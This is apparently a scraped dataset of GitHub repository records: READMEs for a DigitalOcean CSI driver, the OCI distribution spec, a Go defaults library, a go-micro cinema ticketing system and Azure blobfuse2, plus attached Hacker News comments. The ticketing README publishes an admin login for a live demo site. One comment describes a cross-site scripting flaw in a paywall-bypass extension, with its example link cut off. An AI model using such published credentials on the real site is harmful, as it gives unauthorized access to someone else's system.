easily.\n\nSteps to run the tests manually are outlined below.\n\n### Unit Tests\n\nTo execute the unit tests locally, run:\n\n```shell\nmake test\n```\n\n### End-to-End Tests\n\nTo manually run the end-to-end tests, you need to build a container image for your change first and publish it to a registry. Repository owners can publish under `digitalocean/do-csi-plugin:dev`:\n\n```shell\nVERSION=dev make publish\n```\n\nIf you do not have write permissions to `digitalocean/do-csi-plugin` on Docker Hub or are worried about conflicting usage of that tag, you can also publish under a different (presumably personal) organization:\n\n```shell\nDOCKER_REPO=johndoe VERSION=latest-feature make publish\n```\n\nThis would yield the published container image `johndoe/do-csi-plugin:latest-feature`.\n\nAssuming you have your DO API token assigned to the `DIGITALOCEAN_ACCESS_TOKEN` environment variable, you can then spin up a DOKS cluster on-the-fly and execute the upstream end-to-end tests for a given set of Kubernetes versions like this:\n\n```shell\nmake test-e2e E2E_ARGS=\"-driver-image johndoe/do-csi-plugin:latest-feature 1.16 1.15 1.14\"\n```\n\nSee [our documentation](test/e2e/README.md) for an overview on how the end-to-end tests work as well as usage instructions.\n\n### Integration Tests\n\nThere is a set of custom integration tests which are mostly useful for Kubernetes pre-1.14 installations as these are not covered by the upstream end-to-end tests.\n\nTo run the integration tests on a DOKS cluster, follow [the instructions](test/kubernetes/deploy/README.md).\n\n## Prepare CSI driver for a new Kubernetes minor version\n\n1. Review recently merged PRs and any in-progress / planned work to ensure any bugs scheduled for the release have been fixed and merged.\n2. [Bump kubernetes dependency versions](#updating-the-kubernetes-dependencies)\n3. [Support running e2e on new $MAJOR.$MINOR](test/e2e/README.md#add-support-for-a-new-kubernetes-release)\n 1. Since we only support three minor versions at a time. E2e tests for the oldest supported version can be removed.\n4. Verify [e2e tests pass](.github/workflows/test.yaml) - see [here](#end-to-end-tests) about running tests locally\n5. Prepare for [release](#releasing)\n6. Perform [release](.github/workflows/release.yaml)\n\n> See [e2e test README](test/e2e/README.md) on how to run conformance tests locally.\n\n### Updating the Kubernetes dependencies\n\nRun\n\n```shell\nmake NEW_KUBERNETES_VERSION=X.Y.Z update-k8s\n```\n\nto update the Kubernetes dependencies to version X.Y.Z.\n\n> Note: Make sure to also add support to the e2e tests for the new kubernetes version, following [these instructions](test/e2e/README.md#add-support-for-a-new-kubernetes-release).\n\n### Releasing\n\nReleases may happen either for the latest minor version of the CSI driver maintained in the `master` branch, or an older minor version still maintained in one of the `release-*` branches. In this section, we will call that branch the _release branch_.\n\nTo release a new version `vX.Y.Z`, first check out the release branch and bump the version:\n\n```shell\nmake NEW_VERSION=vX.Y.Z bump-version\n```\n\nThis will create the set of files specific to a new release. Make sure everything looks good; in particular, ensure that the change log is up-to-date and is not missing any important, user-facing changes.\n\nCreate a new branch with all changes:\n\n```shell\ngit checkout -b prepare-release-vX.Y.Z\ngit add .\ngit push origin\n```\n\nAfter it is merged to the release branch, wait for the release branch build to go green. (This will entail another run of the entire test suite.)\n\nFinally, check out the release branch again, tag the release, and push it:\n\n```shell\ngit checkout \ngit pull\ngit tag vX.Y.Z\ngit push origin vX.Y.Z\n```\n\n(This works for non-master release branches as well since the `checkout` Github Action we use defaults to checking out the ref/SHA that triggered the workflow.)\n\nThe CI will publish the container image `digitalocean/do-csi-plugin:vX.Y.Z` and create a Github Release under the name `vX.Y.Z` automatically. Nothing else needs to be done.\n\n## Contributing\n\nAt DigitalOcean we value and love our community! If you have any issues or would like to contribute, feel free to open an issue or PR.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "opencontainers/distribution-spec", "link": "https://github.com/opencontainers/distribution-spec", "tags": ["oci", "containers", "docker"], "stars": 521, "description": "OCI Distribution Specification", "lang": "Go", "repo_lang": "", "readme": "# OCI Distribution Specification\n\n[![GitHub Actions status](https://github.com/opencontainers/distribution-spec/workflows/build/badge.svg)](https://github.com/opencontainers/distribution-spec/actions?query=workflow%3Abuild)\n\nThe OCI Distribution Spec project defines an API protocol to facilitate and standardize the distribution of content.\n\n**[The specification can be found here](spec.md).**\n\nThis repository also provides [Go types](specs-go), and [registry conformance tooling](conformance).\nThe Go types and validation should be compatible with the current Go release; earlier Go releases are not supported.\n\nAdditional documentation about how this group operates:\n\n- [Contributing](CONTRIBUTING.md)\n- [Governance](GOVERNANCE.md)\n- [Maintainers' Guide](MAINTAINERS_GUIDE.md)\n- [Releases](RELEASES.md)\n\nThe _optional_ and _base_ layers of all OCI projects are tracked in the [OCI Scope Table](https://www.opencontainers.org/about/oci-scope-table).\n\n## Distributing OCI Images and other content\n\nThe OCI Distribution Spec is closely related to the [OCI Image Format Specification] project,\nthe [OCI Runtime Specification] project,\nand the [OCI Artifacts] project.\n\nThe [OCI Image Format Specification] strictly defines the requirements for an OCI Image (container image), which consists of\na manifest, an optional image index, a set of filesystem layers, and a configuration.\nThe schema for OCI Image components is fully supported by the APIs defined in the OCI Distribution Specification.\n\nThe [OCI Runtime Specification] defines how to properly run a container \"[filesystem bundle](https://github.com/opencontainers/runtime-spec/blob/master/bundle.md)\"\nwhich fully adheres to the OCI Image Format Specification. The OCI Runtime Specification is relevant to the OCI Distribution Specification in that they both support OCI Images,\nand that container runtimes use the APIs defined in the OCI Distribution Specification to fetch pre-built container images and run them.\n\nThe [OCI Distribution Specification] (this project) is also designed generically enough to be leveraged as a distribution mechanism for\nany type of content. The format of uploaded manifests, for example, need not necessarily adhere to the OCI Image Format Specification\nso long as it references the blobs which comprise a given artifact.\n\nThe [OCI Artifacts] project is an effort to provide guidance on how to\nproperly define and distribute content using the OCI Distribution Specification for artifacts which are not container filesystem bundles,\nin a way that is mostly compatible with the existing schemas defined in the OCI Image Format Specification.\n\n[OCI Image Format Specification]: https://github.com/opencontainers/image-spec\n[OCI Runtime Specification]: https://github.com/opencontainers/runtime-spec\n[OCI Distribution Specification]: https://github.com/opencontainers/distribution-spec\n[OCI Artifacts]: https://github.com/opencontainers/artifacts\n\n## FAQ\n\nFor questions about the OCI Distribution Specification, please see the [FAQ](FAQ.md).\n\nFor general questions about OCI, please see the [FAQ on the OCI site](https://www.opencontainers.org/faq).\n\n## Roadmap\n\nThe [GitHub milestones](https://github.com/opencontainers/distribution-spec/milestones) lay out the path to the future improvements.\n\n# Contributing\n\nDevelopment happens on GitHub for the spec.\nIssues are used for bugs and actionable items and longer discussions can happen on the [mailing list](#mailing-list).\n\nThe specification and code is licensed under the Apache 2.0 license found in the `LICENSE` file of this repository.\n\n## Discuss your design\n\nThe project welcomes submissions, but please let everyone know what you are working on.\n\nBefore undertaking a nontrivial change to this specification, send mail to the [mailing list](#mailing-list) to discuss what you plan to do.\nThis gives everyone a chance to validate the design, helps prevent duplication of effort, and ensures that the idea fits.\nIt also guarantees that the design is sound before code is written; a GitHub pull-request is not the place for high-level discussions.\n\nTypos and grammatical errors can go straight to a pull-request.\nWhen in doubt, start on the [mailing-list](#mailing-list).\n\n## Meetings\n\nPlease see the [OCI org repository README](https://github.com/opencontainers/org#meetings) for the most up-to-date information on OCI contributor and maintainer meeting schedules.\nYou can also find links to meeting agendas and minutes for all prior meetings.\n\n## Mailing List\n\nYou can subscribe and join the mailing list on [Google Groups](https://groups.google.com/a/opencontainers.org/forum/#!forum/dev).\n\n## Chat\n\nOCI discussion happens in the following chat rooms, which are all bridged together:\n\n- #general channel on [OCI Slack](https://chat.opencontainers.org/)\n- #opencontainers:matrix.org\n- #opencontainers on freenode.net\n\n## Markdown style\n\nTo keep consistency throughout the Markdown files in the Open Container spec all files should be formatted one sentence per line.\nThis fixes two things: it makes diffing easier with git and it resolves fights about line wrapping length.\nFor example, this paragraph will span three lines in the Markdown source.\n\n## Git commit\n\n### Sign your work\n\nThe sign-off is a simple line at the end of the explanation for the patch, which certifies that you wrote it or otherwise have the right to pass it on as an open-source patch.\nThe rules are pretty simple: if you can certify the below (from [developercertificate.org](http://developercertificate.org/)):\n\n```\nDeveloper Certificate of Origin\nVersion 1.1\n\nCopyright (C) 2004, 2006 The Linux Foundation and its contributors.\n660 York Street, Suite 102,\nSan Francisco, CA 94110 USA\n\nEveryone is permitted to copy and distribute verbatim copies of this\nlicense document, but changing it is not allowed.\n\n\nDeveloper's Certificate of Origin 1.1\n\nBy making a contribution to this project, I certify that:\n\n(a) The contribution was created in whole or in part by me and I\n have the right to submit it under the open source license\n indicated in the file; or\n\n(b) The contribution is based upon previous work that, to the best\n of my knowledge, is covered under an appropriate open source\n license and I have the right under that license to submit that\n work with modifications, whether created in whole or in part\n by me, under the same open source license (unless I am\n permitted to submit under a different license), as indicated\n in the file; or\n\n(c) The contribution was provided directly to me by some other\n person who certified (a), (b) or (c) and I have not modified\n it.\n\n(d) I understand and agree that this project and the contribution\n are public and that a record of the contribution (including all\n personal information I submit with it, including my sign-off) is\n maintained indefinitely and may be redistributed consistent with\n this project or the open source license(s) involved.\n```\n\nthen you just add a line to every git commit message:\n\n Signed-off-by: Jane Smith \n\nusing your real name (sorry, no pseudonyms or anonymous contributions.)\n\nYou can add the sign off when creating the git commit via `git commit -s`.\n\n### Commit Style\n\nSimple house-keeping for clean git history.\nRead more on [How to Write a Git Commit Message](http://chris.beams.io/posts/git-commit/) or the Discussion section of [`git-commit(1)`](http://git-scm.com/docs/git-commit).\n\n1. Separate the subject from body with a blank line\n2. Limit the subject line to 50 characters\n3. Capitalize the subject line\n4. Do not end the subject line with a period\n5. Use the imperative mood in the subject line\n6. Wrap the body at 72 characters\n7. Use the body to explain what and why vs. how\n* If there was important/useful/essential conversation or information, copy or include a reference\n8. When possible, one keyword to scope the change in the subject (i.e. \"README: ...\", \"runtime: ...\")\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "creasty/defaults", "link": "https://github.com/creasty/defaults", "tags": ["golang", "struct", "slice", "map", "nested", "initialize"], "stars": 521, "description": "Initialize structs with default values", "lang": "Go", "repo_lang": "", "readme": "defaults\n========\n\n[![CircleCI](https://circleci.com/gh/creasty/defaults/tree/master.svg?style=svg)](https://circleci.com/gh/creasty/defaults/tree/master)\n[![codecov](https://codecov.io/gh/creasty/defaults/branch/master/graph/badge.svg)](https://codecov.io/gh/creasty/defaults)\n[![GitHub release](https://img.shields.io/github/release/creasty/defaults.svg)](https://github.com/creasty/defaults/releases)\n[![License](https://img.shields.io/github/license/creasty/defaults.svg)](./LICENSE)\n\nInitialize structs with default values\n\n- Supports almost all kind of types\n - Scalar types\n - `int/8/16/32/64`, `uint/8/16/32/64`, `float32/64`\n - `uintptr`, `bool`, `string`\n - Complex types\n - `map`, `slice`, `struct`\n - Nested types\n - `map[K1]map[K2]Struct`, `[]map[K1]Struct[]`\n - Aliased types\n - `time.Duration`\n - e.g., `type Enum string`\n - Pointer types\n - e.g., `*SampleStruct`, `*int`\n- Recursively initializes fields in a struct\n- Dynamically sets default values by [`defaults.Setter`](./setter.go) interface\n- Preserves non-initial values from being reset with a default value\n\n\nUsage\n-----\n\n```go\ntype Gender string\n\ntype Sample struct {\n\tName string `default:\"John Smith\"`\n\tAge int `default:\"27\"`\n\tGender Gender `default:\"m\"`\n\n\tSlice []string `default:\"[]\"`\n\tSliceByJSON []int `default:\"[1, 2, 3]\"` // Supports JSON\n\n\tMap map[string]int `default:\"{}\"`\n\tMapByJSON map[string]int `default:\"{\\\"foo\\\": 123}\"`\n\tMapOfStruct map[string]OtherStruct\n\tMapOfPtrStruct map[string]*OtherStruct\n\tMapOfStructWithTag map[string]OtherStruct `default:\"{\\\"Key1\\\": {\\\"Foo\\\":123}}\"`\n \n\tStruct OtherStruct `default:\"{}\"`\n\tStructPtr *OtherStruct `default:\"{\\\"Foo\\\": 123}\"`\n\n\tNoTag OtherStruct // Recurses into a nested struct by default\n\tOptOut OtherStruct `default:\"-\"` // Opt-out\n}\n\ntype OtherStruct struct {\n\tHello string `default:\"world\"` // Tags in a nested struct also work\n\tFoo int `default:\"-\"`\n\tRandom int `default:\"-\"`\n}\n\n// SetDefaults implements defaults.Setter interface\nfunc (s *OtherStruct) SetDefaults() {\n\tif defaults.CanUpdate(s.Random) { // Check if it's a zero value (recommended)\n\t\ts.Random = rand.Int() // Set a dynamic value\n\t}\n}\n```\n\n```go\nobj := &Sample{}\nif err := defaults.Set(obj); err != nil {\n\tpanic(err)\n}\n```\n", "readme_type": "markdown", "hn_comments": "What about importing sheets too?Not very familiar with the sheets API, but was wondering: how are rate limits applied? Per sheet or in total?Is there a way to get a stream of changes out of prequel (via websocket)?\nThat would make it possible to live-sync between the customer's devices.Would an alternative to this approach be to let your customers copy a spreadsheet of yours that already has an API function connection to your data? This would avoid the need to create users and upserts and all that, no? Or am I missing something?I wonder how long it will be until you have a customer using this just to share data to their own internal teams just so the data team doesn't have to mess around with Sheets!Also\u2014I want Prequel for Zendesk and Greenhouse (and Asana and ...) so badly. There are so many more interesting things I want to be doing with my time at work than babysitting pipelines.You should get Apollo to buy Prequel. Fivetran doesn't support Apollo and I could really use my Apollo data in Snowflake.Nice! Is it a two way sync? I noticed the sheets were locked in the demo.That's a bit of an unfortunate name clash with PRQL, also pronounced prequel: https://prql-lang.org/> To make this possible without creating a superuser that would have access to _all_ the sheets, we had to programmatically generate a different user for each of our customers. We do this via the GCP IAM API, creating a new service account every time. We then auth into the sheet through this service account.nice solution! i've worked with updating sheets in real time with data from the Admin SDK using the Sheets API and service accounts, but yeah that domain-wide delegation is fine for our corp stuff but not so good for customers!great work, will give this a try out for sure! :thumbsup:Interesting! Any plans for SalesForce support?We'd love to have a way to easily sync our internal system's data in/out of SFDC....and a source of GraphQL? :-)One of our engineers recently suggested syncing our PG database to Airtable, solely b/c Airtable has out-of-the-box SFDC integration (webhooks/etc), so our SFDC team could get at the data easier than they could from our PG database.I'm hesitant about \"Airtable as our official 3rd-party integration strategy\", but it does make me pine for a \"protocol\" for one-way/two-way real-time/batch syncing between two systems that just want to share \"dumb\" tables+fields/entities.I was thinking Zapier might have that, like if we implemented the Zapier-TM backend protocol on top of our custom system, and it would ~insta integrate with everything, but in my ~10 minutes of scanning their docs, it seemed less \"protocol\" and more \"configure all the things via clicking around\".I didn't think chatgpt API was available yet?If it's not using chatGPT API I think you should reword/rename everything to be more accurate, including this post, otherwise it stinks of false advertising. I'm sure a lot of people will automatically discount your efforts as soon as they detect the falsehoods.Just my opinion though and I could be wrong.That's cool and all, but I'm probably going to make something to hide it. I also hate paywalls, but (almost) all of them are so easy to circumvent that I usually do it in the inspector.Does anyone remember \"BugMeNot\" ?OK, I need to inquire about `passTheButter()`. A hat tip to \"GreasyFork\"? Or perhaps this is about \"sliding\" past the paywalls?Heads up this is vulnerable to cross site scripting [1]. If someone submits a link like: https://example.com\">\n\nThen simply viewing the hackernews index page with this extension installed will let the submitter execute whatever javascript they want in your logged in hackernews context - no user interaction necessary.[1]: https://github.com/MostlyEmre/hn-anti-paywall/blob/main/scri...This feels very ethically icky to me. Folks are working hard to write these articles, and need to get paid.If you don\u2019t like paywalled articles just don\u2019t read them, I don\u2019t think it\u2019s ethically sound to do this.Just my $0.02Needs to show a project license. Otherwise, pretty cool!Imo these types of thing while probably appreciated by many lead to cat-and-mouse games and probably ultimately to hard-paywalls being more widely adopted (I see them a lot already in fact). So what happens then? The utility of these paywall bypass options diminishes until there\u2019s little of value left behind soft-paywallsThere a \u201cmetadata section\u201d on HN submissions?should be the defaultI would like to be sold on imba first.Now waiting for fireship to make a video on it XDFYI, Formidable is a very popular npm package for forms: https://www.npmjs.com/package/formidableVery awesome to learn about a new language in the Node.js ecosystemSome feedback:- I don\u2019t know what Imba is, and likely a lot of other devs don\u2019t either. Your front page should sell me on both Imba and your framework- When I\u2019m personally considering a new framework. I love example projects so I can see how common usecases might look in code. Consider having a few example projects easily discoverable from the home page for folks to sift throughGood luck!Cool!\nActually, cool is an understatement, but I'm too foreign to Imba to provide feedback on that front.\nPretty sure there is enough to spark a discussion, but few bullet points:* Imba focused, yet you're greeted by TS example and the Imba demo is too dense to parse quickly* Not enough short info and too much text to spark my interest for reading* I still want to read something, so I head to GH repo (I have to search for actual core repo, plus I'm greeted by wall of text again) and when I found it, the README is bare :(https://github.com/oven-sh/bun and bun.sh are pleasant reads for me. All of this is subjective and might turn be a turn-off for hardcore folks, but that's not really the target audience for Imba anyway :)And don't fear the direct URL!This is cool, it's always nice to see inertia.js being used.What's the difference between Imba and JS/TS? Is it anything other than alternative sytax for JS?The webpage is not very conclusive on this. export class TaskController extends Controller {\n\n @use(StoreTaskRequest)\n\n store(request: StoreTaskRequest): void {\n\n const description: string = request.get('description')\n\n }\n\n\nI've done enough Spring Boot to know I never want to do Spring Boot in my life again.https://scrimba.com/scrim/czvKPPswImba was used to build Scrimba, the interactive platform to learn coding(mostly web related courses.)It's pretty cool. I tried it out in its nascent stages.I think one of the reasons for imba not having a framework is, it itself is a framework. It has router support, server side rendering strategy and also comes with its own css support. However, I understand here it is using imba language to create a framework which can use other libraries like React and Vue.I\u2019m definitely going to try this out on a personal project soon.I had forgotten about Imba. I recall trying it a few years ago, and I loved it, with the exception that it wasn\u2019t capable of doing something that I considered rather crucial at the time.I can\u2019t for the life of me remember what it was, and I know there was an issue filed asking for exactly what I wanted, with positive intent to add the feature, but as time went on I kind of dropped and forgot about Imba.I\u2019m curious to try something in it and see how I fare with however far it\u2019s progressed since then. And I will definitely check this framework out when I do.A web framework. You mean a web framework for the NodeJS environment.You can use JavaScript and node for many things that have little to do with serving web pages, and I was really expecting something different or lower-level since you didn't mention \"web\".That's cool!Looks neat!Something for next time, you might get faster/more visibility if you put the url in the link field. I had to scour for it in the description (not really, but you know)https://formidablejs.orgsidebar is blank on mobileNeat resource - anyone know the default command to set font size on Finder to 16?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "wiatingpub/MTBSystem", "link": "https://github.com/wiatingpub/MTBSystem", "tags": ["go", "go-micro", "golang"], "stars": 520, "description": "\u4f7f\u7528go-micro\u5fae\u670d\u52a1\u5b9e\u73b0\u7684\u5728\u7ebf\u7535\u5f71\u9662\u8ba2\u7968\u7cfb\u7edf", "lang": "Go", "repo_lang": "", "readme": "#### \u91c7\u7528go-micro\u5f00\u53d1\u7684\u7535\u5f71\u7968\u5728\u7ebf\u8d2d\u7968\u7cfb\u7edf\n\n-------------------\n\n\u7cfb\u5217\u535a\u5ba2\uff1a\n- https://mp.weixin.qq.com/s/5bn5ZkAJYR0IEaa5H0bsFg\n- https://mp.weixin.qq.com/s/SQ9HS4wKSz8HtNXHOA5oeg\n- https://mp.weixin.qq.com/s/Y55hfVF4a8A6XOI5OHHlgw\n- https://mp.weixin.qq.com/s/Yo2f-XtbbxI6jrYDTtKxKA\n\n-------------------\n\n#### \u6a21\u5757\u5212\u5206\uff1a\n![\u6a21\u5757\u5212\u5206.png](http://upload-images.jianshu.io/upload_images/3365849-dfaec3d3a064fd8a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n#### \u670d\u52a1\u5212\u5206\uff1a\n![\u670d\u52a1\u5212\u5206.png](http://upload-images.jianshu.io/upload_images/3365849-005e52ef50e643ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n#### \u6570\u636e\u5e93ER\u56fe\n![\u6570\u636e\u5e93ER\u5173\u7cfb\u56fe.png](http://upload-images.jianshu.io/upload_images/3365849-9c1abcd5fedd1043.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)\n\n#### \u6280\u672f\u65b9\u6848\uff1a\n- \u670d\u52a1\u7aef\uff1ago-micro\n- \u6570\u636e\u5e93\uff1amysql\n- \u7f13 \u5b58\uff1aredis\n- \u524d \u7aef\uff1ael & vue\n- \u670d\u52a1\u5668\uff1a centos 7 & nginx\n- \u672c\u5730\u73af\u5883\uff1ago1.9\n- \u5bb9\u5668\uff1aDocker\n- \u8fdb\u7a0b\u7ba1\u7406\uff1asupervisor\n- \u6570\u636e\u5e93\u5907\u4efd\uff1a\u51b7\u5907\u4efd(rsync+mysqldump)\n\n#### \u5f00\u53d1\u8fdb\u7a0b\uff1a\n- 1\u3001\u642d\u5efa\u597d\u5f00\u53d1\u6846\u67b6 (get)\n- 2\u3001\u6570\u636e\u5e93\u8bbe\u8ba1(get)\n- 3\u3001\u670d\u52a1\u7aef\u5f00\u53d1(get)\n- 4\u3001\u524d\u7aef\u5f00\u53d1(get)\n- 5\u3001\u8054\u8c03(get)\n- 6\u3001\u4f18\u5316(get)\n\n### \u5982\u4f55\u542f\u52a8\u7a0b\u5e8f\uff1a\n- 1\u3001 ./ctrl.sh build #\u6784\u5efadocker\u73af\u5883\uff0c\u6784\u5efa\u5b8c\u6210\u540e\u53ef\u4ee5\u7701\u7565\u8be5\u6b65\u9aa4\n- 2\u3001 ./ctrl.sh run #\u542f\u52a8docker\u5bb9\u5668\u73af\u5883\n- 3\u3001 ./ctrl.sh init conf #\u73af\u5883\u914d\u7f6e\uff0c\u5305\u62ec\u6570\u636e\u5e93 \n- 4\u3001 ./ctrl.sh init chmod #\u6743\u9650\u8bbe\u5b9a\n- 5\u3001 ./ctrl.sh start #\u542f\u52a8\u5bb9\u5668\n- 6\u3001 ./ctrl.sh login #\u767b\u5f55\u5bb9\u5668\n- 7\u3001 cd /data/deploy/mtbsystem/\n- 8\u3001 bash ./build_local.sh api-srv #\u542f\u52a8api\u670d\u52a1\n- 9\u3001 bash ./build_local.sh all #\u542f\u52a8\u6240\u6709\u670d\u52a1\n\n### \u5982\u4f55\u6dfb\u52a0\u670d\u52a1\n- 1\u3001 \u5728proto\u4e0b\u6dfb\u52a0\u6587\u4ef6\uff0c\u5982cms.ext.proto\n- 2\u3001 \u5728src\u4e0b\u6dfb\u52a0cms-srv\n- 3\u3001 \u5728dockerbase/supervisor\u4e0b\u6dfb\u52a0cms-srv-conf\n- 4\u3001 ./ctrl.sh init conf\n- 5\u3001 ./ctrl.sh login\n- 6\u3001 cd /data/deploy/mtbsystem/\n- 7\u3001 bash ./build_local.sh cms-rv\n\n### mysql\u51b7\u5907\u4efd\n- 1\u3001 \u542f\u52a8\uff1a bash mysql_backup.sh\n- 2\u3001 \u6570\u636e\u6062\u590d\uff1agzip -d mtbsystem-xxxx.sql.gz\n- 3\u3001 \u6570\u636e\u56de\u590d\uff1amysql -u username -p database < \u6587\u4ef6\u540d \n\n### \u6548\u679c\u6f14\u793a\n- 1\u3001\u524d\u53f0\u8bbf\u95ee(\u624b\u673a\u7f51\u7ad9)\uff1ahttp://front.lixifan.cn/\n- 2\u3001\u540e\u53f0\u8bbf\u95ee:http://admin.lixifan.cn/#/login admin 123456 / \u65b0\u5149\u5f71\u57ce xgyc \n\n-------\n\n**Java\u6e90\u7801\u5206\u6790\u3001go\u8bed\u8a00\u5e94\u7528\u3001\u5fae\u670d\u52a1\uff0c\u66f4\u591a\u5e72\u8d27\u6b22\u8fce\u5173\u6ce8\u516c\u4f17\u53f7\uff1a**\n\n![\u516c\u4f17\u53f7.jpg](https://user-gold-cdn.xitu.io/2019/5/29/16aff62fa6acf090?w=258&h=258&f=jpeg&s=16132)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Azure/azure-storage-fuse", "link": "https://github.com/Azure/azure-storage-fuse", "tags": [], "stars": 520, "description": "A virtual file system adapter for Azure Blob storage", "lang": "Go", "repo_lang": "", "readme": "# Blobfuse2 - A Microsoft supported Azure Storage FUSE driver\r\n## About\r\nBlobfuse2 is an open source project developed to provide a virtual filesystem backed by the Azure Storage. It uses the libfuse open source library (fuse3) to communicate with the Linux FUSE kernel module, and implements the filesystem operations using the Azure Storage REST APIs.\r\nThis is the next generation [blobfuse](https://github.com/Azure/azure-storage-fuse)\r\n\r\nBlobfuse2 is stable, and is ***supported by Microsoft*** provided that it is used within its limits documented here. Blobfuse2 supports both reads and writes however, it does not guarantee continuous sync of data written to storage using other APIs or other mounts of Blobfuse2. For data integrity it is recommended that multiple sources do not modify the same blob/file. Please submit an issue [here](https://github.com/azure/azure-storage-fuse/issues) for any issues/feature requests/questions.\r\n\r\n## Features\r\n- Mount an Azure storage blob container or datalake file system on Linux.\r\n- Basic file system operations such as mkdir, opendir, readdir, rmdir, open, \r\n read, create, write, close, unlink, truncate, stat, rename\r\n- Local caching to improve subsequent access times\r\n- Streaming to support reading AND writing large files \r\n- Parallel downloads and uploads to improve access time for large files\r\n- Multiple mounts to the same container for read-only workloads\r\n\r\n## _New BlobFuse2 Health Monitor_\r\nOne of the biggest BlobFuse2 features is our brand new health monitor. It allows customers gain more insight into how their BlobFuse2 instance is behaving with the rest of their machine. Visit [here](https://github.com/Azure/azure-storage-fuse/blob/main/tools/health-monitor/README.md) to set it up.\r\n\r\n## Distinctive features compared to blobfuse (v1.x)\r\n- Blobfuse2 is fuse3 compatible (other than Ubuntu-18 and Debian-9, where it still runs with fuse2)\r\n- Support for higher service version offering latest and greatest of azure storage features (supported by azure go-sdk)\r\n- Set blob tier while uploading the data to storage\r\n- Attribute cache invalidation based on timeout\r\n- For flat namesepce accounts, user can configure default permissions for files and folders\r\n- Improved cache eviction algorithm for file cache to control disk footprint of blobfuse2\r\n- Improved cache eviction algorithm for streamed buffers to control memory footprint of blobfuse2\r\n- Utility to convert blobfuse CLI and config parameters to a blobfuse2 compatible config for easy migration\r\n- CLI to mount Blobfuse2 with legacy Blobfuse config and CLI parameters (Refer to Migration guide for this)\r\n- Version check and upgrade prompting \r\n- Option to mount a sub-directory from a container \r\n- CLI to mount all containers (with a allowlist and denylist) in a given storage account\r\n- CLI to list all blobfuse2 mount points\r\n- CLI to unmount one, multiple or all blobfuse2 mountpoints\r\n- Option to dump logs to syslog or a file on disk\r\n- Support for config file encryption and mounting with an encrypted config file via a passphrase (CLI or environment variable) to decrypt the config file\r\n- CLI to check or update a parameter in the encrypted config\r\n- Set MD5 sum of a blob while uploading\r\n- Validate MD5 sum on download and fail file open on mismatch\r\n- Large file writing through write streaming\r\n\r\n ## Blobfuse2 performance compared to blobfuse(v1.x.x)\r\n- 'git clone' operation is 25% faster (tested with vscode repo cloning)\r\n- ResNet50 image classification job is 7-8% faster (tested with 1.3 million images)\r\n- Regular file uploads are 10% faster\r\n- Verified listing of 1-Billion files in a directory (which v1.x does not support)\r\n\r\n\r\n## Download Blobfuse2\r\nYou can install Blobfuse2 by cloning this repository. In the workspace root execute `go build` to build the binary. \r\n\r\n\r\n\r\n## Supported Operations\r\nThe general format of the Blobfuse2 commands is `blobfuse2 [command] [arguments] --[flag-name]=[flag-value]`\r\n* `help` - Help about any command\r\n* `mount` - Mounts an Azure container as a filesystem. The supported containers include\r\n - Azure Blob Container\r\n - Azure Datalake Gen2 Container\r\n* `mount all` - Mounts all the containers in an Azure account as a filesystem. The supported storage services include\r\n - [Blob Storage](https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction)\r\n - [Datalake Storage Gen2](https://docs.microsoft.com/en-us/azure/storage/blobs/data-lake-storage-introduction)\r\n* `mount list` - Lists all Blobfuse2 filesystems.\r\n* `secure decrypt` - Decrypts a config file.\r\n* `secure encrypt` - Encrypts a config file.\r\n* `secure get` - Gets value of a config parameter from an encrypted config file.\r\n* `secure set` - Updates value of a config parameter.\r\n* `unmount` - Unmounts the Blobfuse2 filesystem.\r\n* `unmount all` - Unmounts all Blobfuse2 filesystems.\r\n\r\n## Find help from your command prompt\r\nTo see a list of commands, type `blobfuse2 -h` and then press the ENTER key.\r\nTo learn about a specific command, just include the name of the command (For example: `blobfuse2 mount -h`).\r\n\r\n## Usage\r\n- Mount with blobfuse2\r\n * blobfuse2 mount --config-file=\r\n- Mount blobfuse2 using legacy blobfuse config and cli parameters\r\n * blobfuse2 mountv1 \r\n- Mount all containers in your storage account\r\n * blobfuse2 mount all --config-file=\r\n- List all mount instances of blobfuse2\r\n * blobfuse2 mount list\r\n- Unmount blobfuse2\r\n * sudo fusermount3 -u \r\n- Unmount all blobfuse2 instances\r\n * blobfuse2 unmount all \r\n\r\n\r\n## CLI parameters\r\n- Note: Blobfuse2 accepts all CLI parameters that Blobfuse does, but may ignore parameters that are no longer applicable. \r\n- General options\r\n * `--config-file=`: The path to the config file.\r\n * `--log-level=`: The level of logs to capture.\r\n * `--log-file-path=`: The path for the log file.\r\n * `--foreground=true`: Mounts the system in foreground mode.\r\n * `--read-only=true`: Mount container in read-only mode.\r\n * `--default-working-dir`: The default working directory to store log files and other blobfuse2 related information.\r\n * `--disable-version-check=true`: Disable the blobfuse2 version check.\r\n * `----secure-config=true` : Config file is encrypted suing 'blobfuse2 secure` command.\r\n * `----passphrase=` : Passphrase used to encrypt/decrypt config file.\r\n- Attribute cache options\r\n * `--attr-cache-timeout=`: The timeout for the attribute cache entries.\r\n * `--no-symlinks=true`: To improve performance disable symlink support.\r\n- Storage options\r\n * `--container-name=`: The container to mount.\r\n * `--cancel-list-on-mount-seconds=`: Time for which list calls will be blocked after mount. ( prevent billing charges on mounting)\r\n * `--virtual-directory=true` : Support virtual directories without existence of a special marker blob for block blob account.\r\n * `--subdirectory=` : Subdirectory to mount instead of entire container.\r\n- File cache options\r\n * `--file-cache-timeout=`: Timeout for which file is cached on local system.\r\n * `--tmp-path=`: The path to the file cache.\r\n * `--cache-size-mb=`: Amount of disk cache that can be used by blobfuse.\r\n * `--high-disk-threshold=`: If local cache usage exceeds this, start early eviction of files from cache.\r\n * `--low-disk-threshold=`: If local cache usage comes below this threshold then stop early eviction.\r\n- Stream options\r\n * `--block-size-mb=`: Size of a block to be downloaded during streaming.\r\n- Fuse options\r\n * `--attr-timeout=`: Time the kernel can cache inode attributes.\r\n * `--entry-timeout=`: Time the kernel can cache directory listing.\r\n * `--negative-timeout=`: Time the kernel can cache non-existance of file or directory.\r\n * `--allow-other`: 